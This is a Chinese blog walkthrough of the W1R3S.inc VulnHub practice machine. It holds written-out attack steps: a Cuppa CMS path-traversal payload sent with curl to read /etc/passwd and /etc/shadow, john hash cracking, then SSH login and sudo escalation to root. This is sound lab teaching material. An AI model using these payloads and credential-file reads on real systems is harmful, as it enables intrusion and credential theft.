W1R3S.inc靶机

最新推荐文章于 2025-12-08 21:00:45 发布
原创 最新推荐文章于 2025-12-08 21:00:45 发布 · 410 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

扫描IP

端口扫描

开放端口 21、22 和 80

目录扫描

收集到信息来看,ftp端口开放并且允许匿名登陆,登录名和密码都写:Anonymous

将ftp上的所有文件都使用get命令下载到kali上

从Ftp服务器下载的文件有: 01.txt02.txt03.txtemployee-names.txtworktodo.txt

可以看到02.txt文件有两段信息,凭经验可以推断出上面一个是md5加密后的字符串,下面一个是base64加密后的字符串

尝试md5解密

MD5解密后的结果为: This is not a password, 意思是"这不是一个密码", 属于无效信息

对base64字符串进行解密

echo "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -d

解密后的内容为"lt is easy, but not that easy", 意思是"这是简单的, 但不是那个简单", 字面意思有点模拟两可, 属于无效信息

查看03.txt文件, 输出一段艺术字体, 信息量很小

查看employee-names.txt文件, 从内容上看是应该是员工信息, 排版位员工名字对应所在部门

查看worktodo.txt, 文件内容是一段倒置过来的字符串

经过处理后得到的文本信息分别是"I don't thınk this is the way to root!"和"we have a lot of work to do, stop playing around", 整段意思是"我不认为这是得到root权限的一种方式, 我们有很多工作要去做, 停止在这里乱搞", 简单来说此处啥都搞不了, 要从其他地方入手

刚刚目录扫描,爆出两个可疑目录/administrator/wordpress

提示没有Administrator权限, 那么此处先放弃

从网站的标题可以看出是该网站的cms为Cuppa, 也可以使用whatweb命令查询

使用searchsploit命令查询Cuppa cms是否存在漏洞:

searchsploit cuppa cms

发现存在一处漏洞, 漏洞详情保存在25971.txt中, 将其导出来:

searchsploit cuppa cms -m 25971.txt

查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload: http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd来试试

浏览器访问:, 没有回显, 此处用的是Get请求, 后面尝试下POST请求

http://192.168.111.141/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

使用curl命令提交Post请求: , 成功得到目标主机的passwd文件内容

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.111.141/administrator/alerts/alertConfigField.php

获取目标主机的shadow文件: 这里可以看到两处很明显的用户信息

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.111.141/administrator/alerts/alertConfigField.php

将shadow文件内容复制到hash.txt中, 然后使用john命令进行破解: john hash.txt

破解后可知两个用户登录口令, 分别是www-data/www-dataw1r32/computer

使用ssh命令登录w1r3s用户:

ssh w1r3s@192.168.111.141

查看当前用户的权限:sudo -l, 可以发现是全权限

直接执行sudo su获取root用户权限

陽陽yy
关注
vulnhub-W1R3S 1.0.1靶机
wjSteve的博客
09-25 275
这个靶机非常简单,如果之前有做过一些靶机的朋友建议不要看WP直接上手,第一次做靶机的也可以用来学习打靶机的基本流程
Vulnhub靶机 W1R3S.inc(渗透测试详解)
2301_78721909的博客
08-03 555
Vulnhub靶机 W1R3S.inc 渗透测试详解(from wuhu)
【vulnhub】W1R3S.inc靶机
wbplife的博客
08-04 563
文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件。这是一个数据库的安装创建,但不知道密码和数据库名,观察到最上面的网页标题为Cuppa CMS,可以通过它来 搜索一下它的历史漏洞,来进行利用。发现了 root 、www-data 、 w1r3s 用户的密码,尝试用 john 破解。在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试。运行环境:vmware。
靶机渗透】w1r3s.v1.0.1靶机渗透练习
serendipity1130的博客
08-30 779
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中) 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 3.使用gobuster扫到后台路径: gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.
w1r3s 靶机学习
m0_63416413的博客
04-09 1447
w1r3s靶机学习,随手记录,参照B站RedTeamNotes的视频学习,红笔老登🤤
vulnhub/W1R3S.inc
qq_45230030的博客
05-09 480
五一加调休在家躺尸真舒服,咸鱼生活真美啊,可惜结束的太快,啊,继续打靶下载地址:https://github.com/rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub)
qq_63442530的博客
03-13 1781
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 2134
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
5-w1r3s.v1.0
Lpyzdzs的博客
10-31 624
5-w1r3s.v1.0
【vulnhub靶场系列】-w1r3s靶场
m0_62484818的博客
11-01 1196
这里解释一下为什么用--data-urlencode参数,因为源码中urlconfig是通过post方式来处理传过来的参数的,而--data-urlencode参数可以对post包中的数据进行URL编码。用dirsearch扫描路径,用到的命令:dirsearch.py -u http://192.168.100.132/ -e*发现字符都是翻转的,我们用这个网址进行翻转:https://www.upsidedowntext.com/发现扫描到/wordpress/wp-login.php路径。
渗透靶场之W1R3S
m0_56190544的博客
06-26 736
完整的解析了vulnhub靶场中的W1R3S的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
红队笔记--W1R3S、JARBAS、SickOS、Prime打靶练习记录
2301_79469341的博客
11-24 1484
80端口是一个CMS,8080端口是一个管理端登录页面,还发现一个robots.txt协议,robots.txt协议中说不希望机器人点击"build"按钮。扫描wordpress/wp-login.php目录和/administrator/installation/目录。出现了下面这个,意思是凭据被安全地加密了。扫描得到secret.txt文件,内容如下:要对每个php文件进行fuzz测试,如果得到参数,进行下一步。由于前面是扫描目录,不会扫描出文件,使用dirb加参数扫描.zip或.txt类型的文件。
Java SE——12.异常(≠错误)《干货笔记
要努力去发光,而不是被照亮~
12-08 1097
Java SE——12.异常(≠错误)《干货笔记
吴恩达新课程:Agentic AI(笔记12)
最新发布
cfy2401926342的博客
12-08 669
摘要:本文介绍了Agent系统中的规划设计模式,该模式使智能体能够自主决定执行复杂任务的工具调用序列,无需硬编码。以客服助理Agent为例,通过提供工具集和LLM编写结构化执行计划(如JSON格式),系统可灵活处理复杂查询。该模式扩展了任务范围,提高了灵活性,但也存在结果不稳定等风险。推荐使用Huggingface社区的smolagents框架,其简洁易用,适合开发者入门和定制化系统。结构化输出(如JSON)确保计划可靠解析和执行,提升系统稳定性。
2025-11-27-LeetCode刷题笔记-3381-长度可被K整除的子数组的最大元素和
tkhhhhh的博客
12-04 387
摘要: LeetCode 3381题要求找出长度能被k整除的子数组的最大和。解题关键在于结合前缀和与模运算技巧:通过计算前缀和数组,按位置模k分类,维护每类余数的最小前缀和。这样可以在O(n)时间内计算每个位置结尾的子数组最大和,只需一次遍历即可得到结果。算法空间复杂度为O(k)。提供了Python、Go和C++的实现代码,并讨论了负数处理等边界情况。核心思路是利用同余性质优化计算,避免暴力枚举。
《人工智能现代方法(第4版)》 第8章 一阶逻辑 学习笔记
data_disciple的博客
12-06 497
本章介绍了从命题逻辑升级到一阶逻辑的必要性和方法。命题逻辑只能描述具体事实,无法表达普遍规律,而一阶逻辑通过引入对象、关系、量词等要素,使智能体能够进行概括性思考。文章详细讲解了一阶逻辑的语法规则(常量、变量、谓词、函数、量词等)、语义解释(模型论)以及知识工程应用(如亲属关系推理)。一阶逻辑虽然强大,但仍存在表达"大多数"、概率和模糊概念等局限。作为AI知识表示的基础,一阶逻辑实现了从"点状思维"到"关系型思维"的转变,但现实世界的不确定性仍需非
Kubernetes(核心概念+使用方法),入门笔记-by B站:GeekHour
2303_77756141的博客
12-04 810
Kubernetes(K8s)是一个开源的容器编排平台,用于自动化部署、扩展和管理容器化应用。其核心组件包括Pod(最小调度单元)、Service(服务抽象)、Ingress(外部访问管理)、ConfigMap/Secret(配置管理)、Volume(持久化存储)等。K8s采用Master-Worker架构,Master节点负责管理,Worker节点运行应用。本地开发可使用minikube搭建简化版集群,生产环境则需多节点保证高可用。常用命令包括kubectl创建Pod、Deployment等资源对象。K8
SpaceClaim流体域创建学习笔记
m0_56086190的博客
12-03 1032
核心思想: 把流体域看作一个普通的几何实体,用SpaceClaim的建模工具直接创建。适用场景外流场分析(汽车、飞机、建筑物)简单规则的内流场核心思想: 当固体模型是一个封闭的容器时,其内部的"空腔"就是流体域。我们需要将这个空腔"实体化"。物理类比想象一个水壶:实体模型 = 壶壁+壶身+壶嘴(外形)流体域 = 如果你能冻住水壶里的水,它的形状抽取过程 = 用"魔法"把壶里的水变成实体适用场景管道系统泵、阀门内部流动热交换器任何"流体在容器内"的情况。
w1r3s.v1.0
03-28
### 关于 W1R3S.v1.0 的 IT 内容及相关下载 W1R3S 是一款由 VulnHub 提供的虚拟机靶场环境,主要用于渗透测试学习和实践。以下是关于 W1R3S.v1.0 版本的相关信息: #### 靶机基本信息 W1R3S.v1.0 是一个初级难度的 CTF 类型靶机,发布于 2018 年 2 月 5 日[^5]。该靶机的目标是通过渗透测试获取系统的 `root` 权限,并找到位于 `/root` 目录下的标志文件 `flag.txt`。 #### 下载链接 W1R3S.v1.0 的官方下载地址如下: - 官方页面:[VulnHub - W1R3S](https://www.vulnhub.com/entry/w1r3s-101,220/) - ZIP 文件下载地址:[https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip](https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip) #### 初始访问凭证 为了进入靶机系统,可以使用默认的 SSH 凭证进行登录: - 用户名:`w1r3s` - 密码:`computer`[^4] #### 渗透测试目标 根据靶机描述,您的主要任务包括: 1. 获得系统的 `root` 权限。 2. 找到并读取 `/root/flag.txt` 中的内容作为最终标志。 #### 可能存在的漏洞 在 W1R3S.v1.0 中提到的新 FTP 服务器可能是一个潜在的安全弱点。这表明可以通过分析 FTP 服务来寻找未授权访问或其他安全配置错误的机会[^2]。 #### 示例代码:SSH 连接脚本 以下是一个简单的 Python 脚本,用于通过 Paramiko 库实现自动化 SSH 登录: ```python import paramiko def ssh_connect(host, username, password): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(host, port=22, username=username, password=password) stdin, stdout, stderr = client.exec_command('whoami') output = stdout.read().decode('utf-8').strip() print(f"Connected as user: {output}") except Exception as e: print(f"Error connecting to host: {e}") if __name__ == "__main__": ssh_connect('192.168.11.134', 'w1r3s', 'computer') # 替换为目标主机 IP 地址 ``` 此脚本可用于验证初始凭据的有效性以及进一步探索系统功能。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值